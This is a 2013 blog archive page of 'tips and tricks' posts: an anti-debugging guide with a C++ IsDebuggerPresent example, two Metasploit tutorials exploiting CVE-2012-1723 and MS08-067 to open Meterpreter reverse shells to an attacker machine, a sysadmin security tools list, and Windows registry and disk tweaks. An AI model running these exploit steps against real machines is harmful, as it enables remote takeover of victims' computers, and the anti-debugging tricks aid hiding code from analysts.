Affichage des articles dont le libellé est TIPS AND TRICKS. Afficher tous les articles
Affichage des articles dont le libellé est TIPS AND TRICKS. Afficher tous les articles

Guide to Anti-Debugging - Overview , Techniques and Approaches

Guide to Anti-Debugging - Overview , Techniques and ApproachesI have been nagged a lot regarding guest posts, and almost 90% of them are related to some news, social media bullshit and half baked security crescendo. Until recently, I was contacted by amiable folks at Infosec Institute with a good article on Anti Debugging. This is an article by  Dejan Lukan, a security researcher at Infosec Institute, in which he discusses the Anti Debugging techniques in an objective and direct manner. I loved the implementation part, reminded me of my rev days (you can learn about how to reverse Winrar or just have a look at a real noobs guide to reverse some more stuff) , and more importantly Dejan explains how to stop (read : slow down) people from reversing your code. Hope you will enjoy it.

Before we begin, we must mention that it’s impossible to completely prevent reversing. What is possible is that we can place as many obstacles on the way as we want to make the process slow enough that reverse engineers will give up. Actually there are hardware implementations where you can buy a black box that attaches to your computer which can do the encryption/decryption for you, but this is far from being used in everyday life.
Techniques to Harden Reverse Engineering

The most basic approaches to harden the reverse engineering of programs are the following [1]:
  1.          Eliminating Symbolic Information
  2.          Obfuscating the Program
  3.          Embedding Antidebugger Code
When eliminating symbolic information, we’re taking the textual information from the program, which means we’re striping all symbolic information from the program executable. In bytecode programs, the executable often contains large amounts of internal symbolic information such as class names, class member names, the names of instantiated global objects. By removing every symbol from the executable or by renaming every symbol, the reverser is faced with a bigger problem than usual because symbol names alone can often be used to gather enough information about what the function does, which simplifies the reverse engineering part.
This can easily be done in C/C++ programs where we only have to append a few compiler flags to the command line that actually compiles the program into the executable. It’s much harder with programming languages like Java and .NET, where those symbols are used internally to reference variables, functions, etc. This is also the reason why Java and .NET programs can easily be converted into a pretty good source code of the original program. We can still strip the symbols from such programs by renaming all the symbols from their meaningful names into meaningless representations, which effectively does the job.
Besides stripping the executable symbols, we can also obfuscate the program. When obfuscating a program, we’re basically changing the code of the program without actually changing the logic behind it, so the program does the same as before but its code is far less readable. Here we have two techniques that can achieve that:
  •  Encoding: With encoding, we must add the decoding instructions that decode the whole program before it’s being run. This can be done by appending the decoding instruction at the end of the program and changing the entry point to point to the decoding instructions. When the program is run, the decoding instructions are executed first, which decodes the whole program into its original form. After that, we must jump to the start of the program and actually run the original instructions as if the encoding didn’t even happen.
  • Packing: When packing the executable, we’re basically reducing the size of the executable as well as encrypting it. When such a program is run, it must first be decoded in memory and then run.
  • By obfuscating the program with nonstandard encoders/packers, we can greatly complicate the task of reverse engineering the executable, but at the end, a persistent reverse engineer will nevertheless be able to bypass that and get the non-obfuscated version of the executable, which can easily be reversed.
Last but not least, we can use an antidebugger code, where we can include a code into the executable that can detect if the program is currently being debugged. If that happens, the program terminates itself prematurely without actually executing the functions that would normally be executed if it wasn’t running under a debugger.
Antidebugging

Before discussing how anti-debugging tricks do their magic, we must first talk about how the debugger is able to debug the program. We know that we can stop and resume the program with the use of either software or hardware breakpoints.
When using software breakpoints, we’re replacing the instruction on which we’ve set the breakpoint with the INT 3 instruction (at least on the x86 architecture), which is a special software interrupt. In this case, we’re passing the value 3 to the instruction INT, which means that we’re generating the software interrupt 3. This causes the function pointed to by the 3rd vector in the interrupt address table (IAT) to be executed. I guess we’re all familiar with the INT 80 interrupt that makes a system call on Linux systems.
The INT 3 instruction temporarily replaces the current instruction in a running program. This is also a way for the debugger to know that a software breakpoint has occurred and the program execution should be stopped. After that, the debugger replaces the INT 3 instruction with the original instruction so the program can continue without the loss of instructions, which can otherwise cause abnormal program behavior.
When we use a hardware breakpoint, it’s the processor’s job to know when the breakpoint has been hit and the program has to be stopped. This is why the program is not modified when a hardware breakpoint is set.
When the breakpoint is hit, the program is stopped and we can safely execute instructions in our favorite debugger. At that point, we can run instructions step-by-step by entering into functions, or by executing them the same time. If we’re interested in what the function does, we need to enter into the function; otherwise we can safely ignore the function and step over it. When stepping through the code, each instruction is executed on its own and then the program is again stopped, so we’re able to analyze what the instruction has just done.

When stepping through the code with a debugger, the Trap Flag (TF) in the EFLAGS register is used. When the TF is enabled, an interrupt will be generated after every executed instruction, so we get the feeling of stepping though the program instruction by instruction.

IsDebuggerPresent

The IsDebuggerPresent is a Windows API function, which we can see on the picture below:
Guide to Anti-Debugging - Overview , Techniques and Approaches

The function doesn’t take any arguments and returns a Boolean value notifying us whether the program is running under a debugger or not. This function can be used to trivially detect whether a debugger is being used to run the program. The function uses the Process Environment Block (PEB) to get information about whether the user-mode debugger is used.
Let’s create a simple program that prints the number 0 or 1 if the debugger is present or not. We can do that by first creating an empty console project under Visual Studio C++ and then changing the code of the main cpp file into the following:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
// isdebuggerpresent.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include
#include

int _tmain(int argc, _TCHAR* argv[])
{
    int num;
    if(IsDebuggerPresent()) {
        num = 0;
    }
    else {
        num = 1;
    }

    printf("Number: %d\n", num);

    /* wait */
    getchar();

    return 0;
}

The program prints “Number: 0″ if the debugger is present and “Number: 1″ if the debugger is not. If we run the application under Visual Studio, the program will display the number 0 because it’s being run under a debugger. This can be seen on the picture below:
Guide to Anti-Debugging - Overview , Techniques and Approaches

Let’s also run the program under OllyDbg to be sure that the number 0 is displayed. This can be quickly confirmed by loading the executable program and running it. On the picture below, we can see that the number 0 was printed when the program was run under OllyDbg debugger:

But if we run the same program under normal cmd.exe, it will display the number 1. This can be seen on the picture below:
Guide to Anti-Debugging - Overview , Techniques and Approaches

We can see that the IsDebuggerPresent API function call works as expected, but that the function call is easy to detect and bypass. This is because we can quickly find this function call in the executable and delete it or bypass it. To do this, we can simply open the executable in Ida debugger and check out the Imports table to verify if that function exists somewhere in there. We’re right, the function IsDebuggerPresent is listed among all the imported functions as we can see on the picture below:
Guide to Anti-Debugging - Overview , Techniques and Approaches

This is a clear indication that the executable is using the function to do something different when the debugger is attached to the executable. We can also locate the exact instructions that are used to call that function. The whole Ida graph of the main function that does exactly the same as the main function from the C++ source code above is presented on the picture below:
Guide to Anti-Debugging - Overview , Techniques and Approaches

We can see that, at first, we’re initializing the stack for the function and calling the IsDebuggerPresent function. After that, we’re testing the returned value in eax against itself to determine whether a true or false value was returned. If the eax holds a value different than 0 (1 in our case), then the zero flag will be set and the first box that sets the [ebp+num] to 0 is called. This is exactly what happens now, because we’re running the program under a debugger, but otherwise the block that sets the [ebp+num] to 1 is called. After that, we’re just moving the value of [ebp+num] into the register eax and printing it with the printf function.
If we now set the breakpoint on the call to the IsDebuggerPresent function and rerun the program, the execution will be stopped right where we want it. After the breakpoint has been hit, we can step into the function to see what the function actually does. On the picture below, we can see the function in question:
Guide to Anti-Debugging - Overview , Techniques and Approaches

We can see that the function is pretty simple: we’re loading the address of the currently active thread (TIB) in the register eax and then accessing the structure member that’s located at the 0×30 offset; the PEB data structures lies at that offset. After that, we’re loading the address of PEB in eax and then accessing its data member at 0×2 offset, which holds the data member named BeingDebugged. Thus, we’ve successfully taken a look at what the IsDebuggerPresent function actually does and how it does it. We can see that it’s very simple and not really hard to bypass.

We can determine that IsDebuggerPresent is being used when we try to reverse engineer an executable and the program terminates prematurely, a different execution path is taken, or something else unexpected happens. In such cases, we must first check the Imports table if the IsDebuggerPresent function is being called anywhere in the executable. If that is the case, we can simply delete the instructions that call the IsDebuggerPresent function call, so it won’t bother us when reversing the executable.
On the other hand, if we’re developing a program and we would like to use the IsDebuggerPresent function call, we can copy the above instructions directly into our code, so that we’re not actually calling the IsDebuggerPresent function directly, but using its function body instructions to figure out whether the debugger is being used to run the executable. This is just another trick so that reverse engineers won’t immediately notice the use of IsDebuggerPresent function call and will make the debugging slightly more complicated.
Conclusion

For a deeper understanding of reverse engineering, check out the reverse engineeringtraining course offered by the InfoSec Institute. In this article we’ve seen a few techniques to harden the reverse engineering process. The technique easiest to bypass is symbol elimination where we have to delete all the symbols presented in the executable. This effectively makes the names of the functions unavailable when debugging, which leaves it up to the debugger to properly name the functions. Another technique is program obfuscation, which can be a pretty simple operation like xoring the whole executable then running it, but it can also be pretty complicated. Things get further complicated if we’re using obfuscation with the anti-reversing techniques, which detects if the program is being reversed and terminates the program prematurely if so, greatly hardening the reverse engineering of the executable.
References:
[1]: Reversing: Secrets of Reverse Engineering, Eldad Eilam.

Read more

by Malik korrich ~ samedi 4 mai 2013 0 commentaires

Hacking Remote Pc by Exploiting Java Applet Field Bytecode Verifier Cache Remote Code Execution

CVE-2012-1723: A vulnerability in the HotSpot bytecode verifier where an invalid optimization of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficient type checking. A specially-crafted class file could possibly use this flaw to bypass Java sandbox restrictions, and load additional classes in order to perform malicious operations. The vulnerability was made public by Michael ‘mihi’ Schierl.

Requirement:

  • Attacker Machine: Backtrack
  • Victim Machine: Windows (install JRE un-patched version  )
Step1: Launch the Metasploit console
Open the Terminal in the Attacker Machine(Backtrack).
Type "msfupdate" , this will update the metasploit with latest modules.
Now type "msfconsole" to get interaction with the Metasploit framework.

Step 2:
Type "use exploit/multi/browser/java_verifier_field_access" and follow the below commands:


msf exploit(java_verifier_field_access) > set PAYLOAD java/meterpreter/reverse_http
msf exploit(java_verifier_field_access) > set LHOST [Backtrack IP ADDRESS]
msf exploit(java_verifier_field_access) > exploit

If you don't know what i am talking about , please read my previous tutorial.

Step 3:
If you follow the above commands correctly, you will get the following result.

Copy the url and open the link in the victim machine. Once the url loaded in the victim machine, it will launch the exploit and creates a new session.

Now type "sessions", this will show the list of active sessions .

Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter. Meterpreter will help you to interact/control the Target.

References:
  • POC: http://schierlm.users.sourceforge.net/CVE-2012-1723.html
  • Metasploit Module: http://www.exploit-db.com/exploits/19717/
Read more

by Malik korrich ~ vendredi 3 mai 2013 0 commentaires

[Metasploit Tutorial] Hacking Windows XP using IP Addres


Do you think it is possible to hack some one computer with just an ip address?! The answer is yes, if you are using unpatched(vulnerable) OS.  If you don't believe me, then read the full article.

In this article i am going to demonstrate how to hack a remote computer by exploiting the  parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service(CVE-2008-4250). Before we jump into the actual exploitation process, let me give more details about this Server Service Vulnerability.

Details about Server Service Vulnerability(MS08-067):
Microsoft Windows Server service provides support for sharing resources such as files and print services over the network.

The Server service is vulnerable to a remote code-execution vulnerability. The vulnerability is caused due to an error in netapi32.dll when processing directory traversal character sequences in path names. This can be exploited to corrupt stack memory by e.g. sending RPC requests containing specially crafted path names to the Server Service component. The 'NetprPathCanonicalize()' function in the 'netapi32.dll' file is affected.

A malicious request to vulnerable system results in complete compromise of vulnerable computers.
This vulnerability affects Windows XP, Windows 2000, Windows Server 2003, Windows Vista, and Windows Server 2008. But Attackers require authenticated access on Windows Vista and Server 2008 platforms to exploit this issue.

Exploiting the MS08-067 using Metasploit:

Requirements:

  • VirtualBox
  • Backtrack 5
  • Target OS(XP)
Step 1:

Create Two Virtual Machine(VM) namely "Target" and "BT5".  Install the XP inside Target VM and Backtrack inside BT5. Start the Two VMs.

If you don't know how to create virtual machines , then please read this VirtualBox Manual.

Step 2: Find the IP address of Target
Open The command prompt in the Target machine(XP). Type "ipconfig" to find the IP address of the Target system.

Hackers use different method for finding the ip address of victim.  For Eg., By sending link that will get the ip  details or use Angry IP Scanner.

Step 3: Information Gathering
Now let us collect some information about the Target machine.  For this purpose , we are going to use the nmap tool.

Open The Terminal in the BT5 machine(Backtrack) and type "nmap -O 192.168.56.12".  Here 192.168.56.12 is IP address of Target machine. If you look at the result, you can find the list of open ports and OS version.


Step 4: Metasploit
Now open the Terminal in the BT5 machine(Backtrack) and Type "msfconsole".

The msfconsole is the most popular interface to the Metasploit Framework. It provides an "all-in-one" centralized console and allows you efficient access to virtually all of the options available in the Metasploit Framework.

Let us use the Search command to find the exploit modules with the keyword netapi. Type "search netapi".  Now you can see the list of modules match with the netapi.


We are going to exploit MS08-067 , so type "use exploit/windows/smb/ms08_067_netapi".

Step 5: Set Payload
As usual, let use the Reverse Tcp Payload for this exploit also. Type "set payload windows/meterpreter/reverse_tcp" in the msfconsole.

Step 6: Options
Type "set LHOST 192.168.56.10".  Here 192.168.56.10 is IP address of Backtrack machine.  You can find the ip address by typing 'ifconfig' command in the Terminal.

Type "set RHOST 192.168.56.12".  Here 192.168.56.12 is IP address of Target machine.

Step 7: Exploiting
Ok, it is time to exploit the vulnerability, type "exploit" in the console. If the exploit is successful, you can see the following result.

Now we can control the remote computer using the meterpreter. For example, typing "screenshot" will grab the screenshot of the victim system.
Read more

by Malik korrich ~ 0 commentaires

10 System Admin Tools to Help You Secure Your Network



System admins are frequently bombarded with security concerns, requests, alerts, news items, “did you see this?!” emails, and more. Keeping up with all the aspects of network security can seem like an overwhelming task, but in this post we’re going to look at ten tools a system admin can use to help secure their network. Some you may be familiar with, like network security software, while others may come as a surprise, like your email client; but all will help you to stay ahead of the bad guys, keep yourself informed of the latest threats, and maintain the security of your network.

1. Network security software
When we talk about network security software, we’re talking about a class of product more than any specific tool, and how important it is for you to have an application or small group of applications that can help you to accomplish most of your tasks. There are simply too many things for any one admin to do by hand, and network security software applications help to automate the heavy lifting and ensure that you can keep up with the workload. Look for network security software that multitasks. Think about it as a Swiss Army knife of software packages that includes many of the other items on this list.

2. Vulnerability scanner
A good vulnerability scanner is a key part of any toolkit, and should be used by server admins and security engineers alike. The top network security software apps will include a scanner that has a database of the thousands of vulnerabilities that could exist on your network, so that you can quickly, easily and regularly scan your network to ensure you systems are up-to-date, configured properly and secured.

3. Port scanner
A port scanner is another regular tool that should be in your network security software application. Attackers regularly scan your Internet connection looking for ways in and so should you. But you should also scan internally so you can find unauthorized services or misconfigured systems, and to validate your internal firewalls are set up correctly.

4. Patching software
Patching operating systems and third party applications is one of the most important, regularly recurring tasks a sys admin has. Network security software that can automate this, and handle the hundreds of other applications on your network, is the only realistic way you can keep up with this.

5. Auditing software
Auditing software may strike you as a strange recommendation at first, but consider all those apps you are trying to patch. How can you be sure you have no vulnerabilities on your systems if your users can install anything on your systems? How are you going to maintain licensing compliance if you don’t know who has installed what from \software? Network security software may also include software and hardware inventory components to help you stay informed and secure.

6. Secure remote clients
Telnet, older versions of PCAnyWhere and several of the web-based remote access apps that are out there all have a common issue - they’re not secure. Use SSH v2 or later for secure access to all CLI-based systems, and the most secure versions of Remote Desktop Protocol to manage Windows boxes. Using strong encryption, good passwords, lockout policies and, when possible, mutual authentication between client and host, will help to ensure no one sniffs credentials or brute-forces their way into a system. If you have two-factor authentication in your environment, ensure that every system possible uses it to further reduce your risk from unauthorized access.

7. A good network analyzer
Whether you like the open source WireShark, the free Microsoft tool NetMon, or one of the many other commercial network analysis tools, having a good “sniffer” is key to helping secure and analyze systems. There is simply no way that’s more effective to figure out just what is going on between networked systems than to see the traffic first hand.

8. Network tools
Whenever you are dealing with connections from foreign systems, you will find the need to check network addresses, routes and more. Having good tools like DIG, WHOIS, HOST, TCPING and others close at hand makes network evaluation a breeze.

9. Log parsing software
Securing systems means going through logs; lots of them. Web logs, access logs, system logs, security logs, SNMP logs, syslog logs – the list goes on and on. Having software that can quickly and easily parse through logs is critical. Everyone has their favorite. Some install locally like LogParser, while others run on servers like Splunk. Whichever you prefer, get a good log parser to help wade through what can be millions of entries quickly and easily so you can find events you need to check.

10. Your email client
Knowledge is power, and the best way to amass that knowledge is to stay informed. Whether you subscribe to email bulletins, security alerts, or RSS feeds, your email client can provide you the first indications that something new is out there, and also what you need to do to protect your systems from the threat. Zero day exploits, out of band patches, best practices and more, can all be yours if you simply join the right distribution lists and subscribe to the right lists.

These 10 system admin tools are a great start towards building your toolkit for security. Network security software plays a major role in this toolkit, which you supplement with other tools and the information you need to maintain a secure environment.

This guest post was provided by Emmanuel Carabott on behalf of GFI Software Ltd. Learn more about the importance of a secure business network by downloading the free eBook: A first aid kit for SysAdmins. All product and company names herein may be trademarks of their respective owners.
Read more

by Malik korrich ~ jeudi 2 mai 2013 0 commentaires

Take screen shot of any site



Friends, do u want to take screen shot of any site than follow steps

1. Go this site..
2. Copy link and paste it in site and click on get image..
Read more

by Malik korrich ~ dimanche 14 avril 2013 0 commentaires

Convert fat32 to ntfs without loseing data




How to Do It:

You don’t need to install a
program to change the filetype
from FAT32 to NTFS.
1. Press the Start button.
2. Go to Run…
3. Type in “cmd” without the
quotes, press OK.

4. Go to your C:/ folder, by
typing in cd\, (or “cd..”just as
long till you have reached C:/ ).
See above image. Likewise, type
in “cd c:\” works, as well.

5. Go to your “My Computer”
icon, and see the name of the
letter that stands in from of
the drive you want to convert!

6. Back in cmd, Press in
“CONVERT X: /
FS:NTFS” (without the quotes).
The X is for the letter your
system drive, or external drive
name. (see Step 5)

7. On the question ‘convert
lost chains top files Y/N?‘
press ‘y‘ and continue.

8. cmd will now check the file
system and the rest. If your
cmd finishes, your file system
is converted to NTFS. You can
close down cmd. (If you want to
check if it really did finished,
go to ‘My Computer’ and right
click on the drive, select
‘Properties’ to see what kind of
file system it has).

9. If cmd says: ‘X: was not
converted to NFTS, the
conversion failed etc, you must
follow the next steps!

10. As you can see above, my
cmd failed the first time. Next
solution.

11. Type in “chkdsk X: /f“,
where X is the letter of your
drive. Wait a while to finish.

12. You’ll be asked to ‘convert
lost chains top files Y/N?‘
press ‘y‘ and continue. Wait for
it to finish.

13. After this, cmd will say
that converting was successful.
Check it by going to your
computer, and single click on the
drive to see what kind of file
system your drive has. You may
need to repeat step 6.
Read more

by Malik korrich ~ 0 commentaires

Remove Shortcut arrow from any icon


You see arrow on dasktop in shortcut icon you think how to remove it now you can remove it to follow steps-:

Go to Start &
select Run
In Run box type
as RegEdit
(Registry Editor)
Then go to path
as shown below:
HKEY_CLASSES_ROOT
\lnkfile
Then on the right side you
can see some of files which
contains the file
"IsShortcut" also, Just
select it & then delete.
Then again fallow
the path as shown
below
HKEY_CLASSES_ROOT
\piffile
Then as-usual again on the
right side you can see some
of files which contains the
file "IsShortcut" also, Just
select it & then delete it.

now restart windows and you done.
Read more

by Malik korrich ~ 0 commentaires

How to know that who used your PC in your Absence



Today we are posting very important trick for your safety.. You can find what been used in your computer in your absense.. Yes, all the data which used by others now you can know completely.

 Just Follow Below Simple Steps:

 Step:-1) Click on Start >> Run And Type eventvwr.msc (Events are stored in three log files: Application, Security, and System.) These logs can be reviewed and archived.
 Step:-2) we want the System log. Click on "System" in the left-hand column for a list of events. Go there and check..

 Enjoy..
Read more

by Malik korrich ~ 0 commentaires

Make your Friends Fool with the trick



MAKING FOOL OF FRIENDS,COLLEAGUES IS THE MOST ENTERTAINING TASK. THIS POST WOULD SHOW YOU A METHOD BY WHICH YOU CAN CHANGE THE HARDWARE DESCRIPTION OF YOUR COMPUTER AND FOOL YOUR FRIENDS INTO BELIEVING THAT YOU HAVE THE LATEST VERSION OF PROCESSOR WHICH IS YET TO BE LAUNCHED.

 JUST FOLLOW THE SIMPLE STEPS

 STEP 1. GO TO START RUN ... AND TYPE REGEDIT.
 THIS WOULD OPEN THE REGISTRY EDITOR.
 STEP 2. SELECT HKEY_LOCAL_MACHINE STEP
 3. SIMILARLY SELECT HARDWARE THEN DESCRIPTION THEN CENTRALPROCESSOR AND FINALLY SELECT 0.
 STEP 4. ON THE RIGHT HAND SIDE OF THE WINDOW. RIGHT CLICK ON PROCESSORNAMESTRIN G AND CLICK MODIFY. 
STEP 5. MODIFY THE NAME TO ANY NAME YOU WANT. LETS SAY PENTIUM 5 I11 AS SHOW BELOW. ALL DONE.

 HIT OK AND CLOSE THE REGISTRY EDITOR. NOW CHECK THE SYSTEM PROPERTIES BY RIGHT CLICKING ON MYCOMPUTER AND SELECT PROPERTIES. YOU WOULD GET
Read more

by Malik korrich ~ 0 commentaires

« Articles plus anciens